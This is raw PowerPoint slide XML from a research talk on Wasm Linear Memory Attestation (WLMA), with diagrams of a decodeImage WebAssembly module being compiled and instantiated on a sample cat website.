            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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625CF28-E5AC-DEA8-7545-64F761425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539722"/>
            <a:ext cx="10515600" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t>WLMA:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t> Linear Memory Attestation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CD283F-8566-C02B-EEE5-DDF20343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6B955F-C9CB-CFD3-1738-3C8FE58E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451" y="6492874"/>
            <a:ext cx="5195099" cy="228601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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19AD23-8AB2-D177-DEA9-8B0A10C2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7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uppieren 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EEFC1C-E2A7-BC73-7A8E-432DA14D363E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6364756" y="1132902"/>
            <a:ext cx="4998907" cy="5285904"/>
            <a:chOff x="6364756" y="1132902"/>
            <a:chExt cx="4998907" cy="5285904"/>
          </a:xfrm>
        </p:grpSpPr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573369F2-3C00-2D61-1277-571D18A6B470}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636693" y="1135142"/>
              <a:ext cx="4726970" cy="528366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88F26107-807D-7BAF-27C4-EF288371587B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6364756" y="1132902"/>
              <a:ext cx="4764798" cy="482953"/>
              <a:chOff x="6364756" y="1132902"/>
              <a:chExt cx="4764798" cy="482953"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1073" name="Gruppieren 1072">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8016F708-087F-CE2A-FEF2-FCF86BF51CDB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7322507" y="1194181"/>
                <a:ext cx="3807047" cy="386795"/>
                <a:chOff x="7034134" y="823074"/>
                <a:chExt cx="4472396" cy="346994"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="Rechteck: abgerundete Ecken 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27226058-6E6D-E7E3-6A68-116B13D4D496}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7034134" y="823074"/>
                  <a:ext cx="3275475" cy="344195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2000"/>
                    <a:t>http://CuteCats.com/</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1070" name="Interaktive Schaltfläche: Zur Startseite wechseln 1069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0CF7D1A7-ADF9-3F1C-3A1A-B21AC1BA9340}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10382261" y="831668"/>
                  <a:ext cx="379329" cy="337053"/>
                </a:xfrm>
                <a:prstGeom prst="actionButtonHome">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="E7E6E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1" name="Interaktive Schaltfläche: Dokument 1070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E4005FE5-02E2-4CFB-8128-814017E0527A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10821781" y="831668"/>
                  <a:ext cx="315047" cy="337053"/>
                </a:xfrm>
                <a:prstGeom prst="actionButtonDocument">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="E7E6E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Interaktive Schaltfläche: Zurück oder Vorherige(r) 1071">
                  <a:hlinkClick r:id="" action="ppaction://noaction" highlightClick="1"/>
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EAECF39-736A-C505-8D50-F3DB9546F987}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="11197020" y="831668"/>
                  <a:ext cx="309510" cy="338400"/>
                </a:xfrm>
                <a:prstGeom prst="actionButtonBackPrevious">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="E7E6E6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B37C9ED4-31C1-FC10-B471-B5A858C4DAB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6364756" y="1132902"/>
                <a:ext cx="1007614" cy="482953"/>
                <a:chOff x="6194550" y="522582"/>
                <a:chExt cx="842006" cy="438681"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Google Shape;316;p34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE9FFA2-4643-2C93-4AE1-F89EFCDDD00E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr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194550" y="522832"/>
                  <a:ext cx="421002" cy="43843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7" name="Google Shape;317;p34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C805DA07-2118-5D9C-F374-62A1A55CAF77}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr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615553" y="522582"/>
                  <a:ext cx="421003" cy="4132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812BB76-837E-B0EA-395A-22E17F117404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="72388" y="873506"/>
            <a:ext cx="5404711" cy="2310044"/>
            <a:chOff x="72388" y="873506"/>
            <a:chExt cx="5404711" cy="231004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469768E-7977-DF1D-D744-3EFA5744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2388" y="873506"/>
              <a:ext cx="1311810" cy="1159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hteck: abgerundete Ecken 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80213578-FB5E-47A3-B9A5-A1303431E4DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1105989" y="1770142"/>
              <a:ext cx="4371110" cy="1413408"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect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>
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>u</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0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8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA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2000" b="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>decodeImage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" err="1">
                  <a:solidFill>
                    <a:srgbClr val="CCCCCC"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" err="1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mageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0">
                  <a:solidFill>
                    <a:srgbClr val="CCCCCC"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> v)</a:t>
              </a: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B20A9C6-9587-7529-242C-D84980C5D651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="984266" y="3321755"/>
            <a:ext cx="2269979" cy="1209364"/>
            <a:chOff x="984266" y="3321755"/>
            <a:chExt cx="2269979" cy="1209364"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Pfeil: nach unten 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CA9CA0-DB97-393F-8EA3-3A907B699507}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2922726" y="3321755"/>
              <a:ext cx="331519" cy="120936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489A279B-D859-6AA5-85A5-BF8E6639D20C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="984266" y="3639941"/>
              <a:ext cx="1943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i="1" err="1"/>
                <a:t>Compilation</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2800" i="1"/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B084CCD-291B-0E49-F374-7799533C38E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2061427" y="4598484"/>
            <a:ext cx="2307427" cy="1727399"/>
            <a:chOff x="2009173" y="4851040"/>
            <a:chExt cx="2307427" cy="1727399"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Grafik 42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8409A141-B64E-5048-B5E3-FB93B07B4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2433736" y="4851040"/>
              <a:ext cx="1254554" cy="1109026"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1027" name="Textfeld 1026">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE83878-040D-ECC3-598B-AD119C52AE95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009173" y="6055219"/>
              <a:ext cx="23074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err="1"/>
                <a:t>Wasm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800"/>
                <a:t> Module</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1046" name="Gruppieren 1045">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC5CBD33-F083-2FC7-77A2-4E3C67A991DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4142536" y="4609731"/>
            <a:ext cx="2032109" cy="948559"/>
            <a:chOff x="3370754" y="4251678"/>
            <a:chExt cx="2475074" cy="1306926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Pfeil: gestreift nach rechts 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1A616C-70A9-E47A-F648-3A2EAA7364A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3430766" y="4861588"/>
              <a:ext cx="2415062" cy="697016"/>
            </a:xfrm>
            <a:prstGeom prst="strip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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Textfeld 1031">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2144381-EBED-FC76-B267-FA8F4AB89BC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3370754" y="4251678"/>
              <a:ext cx="2474511" cy="720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i="1" err="1"/>
                <a:t>Instantiation</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2800" i="1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4676C8-BBCE-631E-C020-FFCBB679B0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6720706" y="5369963"/>
            <a:ext cx="4556891" cy="903699"/>
            <a:chOff x="7034134" y="4785670"/>
            <a:chExt cx="4492491" cy="1843446"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1025" name="Gruppieren 1024">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910C711F-E0D0-2B5A-B4C4-66DC4117A4D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7034134" y="5217678"/>
              <a:ext cx="4492491" cy="1411438"/>
              <a:chOff x="6428659" y="1543935"/>
              <a:chExt cx="4638462" cy="1758645"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Rechteck: abgerundete Ecken 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0853E204-5952-3012-0B13-EA6698BD5DBA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6428659" y="1543935"/>
                <a:ext cx="4638462" cy="1758645"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="5715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de-DE" sz="1200" b="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1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65DB4B7E-06D7-594C-B63E-C09945317C85}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6750500" y="1913342"/>
                <a:ext cx="4249301" cy="101695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de-DE" sz="2000" b="0" dirty="0" err="1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func</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="2000" b="0" dirty="0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 $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1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decodeImage</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1033" name="Grafik 1032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BDA5ECF2-7D9F-368A-11DF-157C4881E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0749944" y="4785670"/>
              <a:ext cx="776677" cy="15144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60D749-32EC-56B7-4C61-D8F5E12F9382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6720708" y="3821864"/>
            <a:ext cx="4826838" cy="1251228"/>
            <a:chOff x="6871476" y="3211908"/>
            <a:chExt cx="5342282" cy="1367424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1061" name="Rechteck: abgerundete Ecken 1060">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49735A24-7E4A-90D4-23E8-F9A2138529B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6871476" y="3670352"/>
              <a:ext cx="5043508" cy="9089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7E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2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="654FF0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="654FF0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>decodeImage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1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imageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="Grafik 39" descr="Ein Bild, das gelb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933606DF-52F2-5956-FB95-F065796FE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1417168" y="3211908"/>
              <a:ext cx="796590" cy="83795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6D99C7C-4007-80E4-93F4-6CEDB1859F71}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4521236" y="2001599"/>
              <a:ext cx="296" cy="180025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6D99C7C-4007-80E4-93F4-6CEDB1859F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91636" y="1965594"/>
                <a:ext cx="59200" cy="251675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C26459B-A688-572E-59FC-6727FF733FD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7123094" y="1684196"/>
            <a:ext cx="3980741" cy="2341832"/>
            <a:chOff x="7014919" y="1649949"/>
            <a:chExt cx="4308827" cy="2286326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Grafik 7" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726A3602-6ECF-FBB0-5F85-C82920D5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7014919" y="1684197"/>
              <a:ext cx="4192815" cy="225207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8" name="Grafik 1067" descr="Ein Bild, das Grafiken, Logo, Schrift, Symbol enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B63F52-E9CA-ACAC-6843-900BD836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10604014" y="1649949"/>
              <a:ext cx="719732" cy="636243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Gerade Verbindung mit Pfeil 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1061" idx="2"/>
            <a:endCxn id="56" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8999152" y="5073092"/>
            <a:ext cx="2" cy="508651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krümmter Verbinder 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1061" idx="1"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6720708" y="2872652"/>
            <a:ext cx="402386" cy="1784570"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -56811"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="654F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026AF6-EDDB-AF0F-B910-9A5E59E5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6F056E1E-CC02-9FB7-9558-154113A0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</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Titel 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D02E9607-6CBF-EE16-6FE1-943C586D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136525"/>
            <a:ext cx="10515600" cy="900000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>)	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DCFC703E-A7C5-6C7C-7822-F7D5D07F83B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828338" y="870141"/>
            <a:ext cx="10535325" cy="265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[Haas, et al., PLDI 2017]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Fußzeilenplatzhalter 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0604256-A065-0048-BE2F-AE00D6ED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Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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25435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D0A57854-A81D-8BB0-1EDF-E62F618AFCAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6622213" y="3986943"/>
            <a:ext cx="5258598" cy="2416987"/>
            <a:chOff x="6622213" y="3986943"/>
            <a:chExt cx="5258598" cy="2416987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Rechteck: abgerundete Ecken 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EAA09EA-4B35-5899-701E-2B21B83C3014}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6622213" y="3986943"/>
              <a:ext cx="5258598" cy="241698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dk1"/>
            </a:lnRef>
            <a:fillRef idx="1001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664C8D0-F0B8-8B47-316A-AD0BF2CA45B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6936186" y="4053655"/>
              <a:ext cx="4779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Online Attestation + </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
                <a:t>Inference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800" dirty="0"/>
                <a:t> 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7B4023B-B549-9B0C-8121-F57E857ED94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="120073" y="3926016"/>
            <a:ext cx="6224859" cy="2522872"/>
            <a:chOff x="120073" y="3926016"/>
            <a:chExt cx="6224859" cy="2522872"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Rechteck: abgerundete Ecken 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BDD11F-8D72-72AA-39DC-18DA581A3789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="120073" y="3926016"/>
              <a:ext cx="6224859" cy="25228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1001">
              <a:schemeClr val="dk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2504896-058F-62D4-6ADC-E42D55412E9D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="274750" y="4012724"/>
              <a:ext cx="2565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/>
